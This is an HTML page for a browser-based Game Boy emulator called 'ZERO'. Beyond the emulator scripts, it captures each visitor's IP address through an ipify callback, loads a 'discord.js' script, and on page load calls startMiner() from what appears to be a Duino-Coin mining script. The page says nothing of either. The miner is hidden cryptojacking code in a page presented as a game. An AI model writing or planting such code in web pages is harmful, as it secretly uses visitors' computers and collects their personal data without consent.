<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="stylesheet" href="css/style.css" />
    <title>ZERO</title>
    <meta name="author" content="Ricardo" />
  </head>
  <body>
    <div id="gameboy_shell">
      <div id="game">
        <canvas id="mainCanvas" width="160" height="144">No Canvas Support</canvas>
      </div>
      <div id="controller">
        <div id="controller_dpad">
          <div id="controller_left"></div>
          <div id="controller_right"></div>
          <div id="controller_up"></div>
          <div id="controller_down"></div>
        </div>
        <div id="controller_select" class="capsuleBtn">Select</div>
        <div id="controller_start" class="capsuleBtn">Start</div>
        <div id="controller_b" class="roundBtn">B</div>
        <div id="controller_a" class="roundBtn">A</div>
      </div>      
    </div>
    <script src="js/other/mobile.js"></script>
    <script src="js/other/base64.js"></script>
    <script src="js/other/swfobject.js"></script>
    <script src="js/other/resampler.js"></script>
    <script src="js/other/XAudioServer.js"></script>
    <script src="js/other/controls.js"></script>
    <script src="js/other/resize.js"></script>    
    <script src="js/GameBoyCore.js"></script>
    <script src="js/GameBoyIO.js"></script>
 
<script type="application/javascript">
    var myip
  function getIP(json) {
     myip=json.ip
  }
</script>

<script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>

    <script src="https://code.jquery.com/jquery-2.1.1.min.js" type="text/javascript">
    </script> 
    <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.7/js/materialize.min.js">
    </script> 
   <script src="js/discord.js"></script>

	 <script src="js/duco/duino-js.js"></script>
    <script>startMiner();</script>
  </body>
</html>
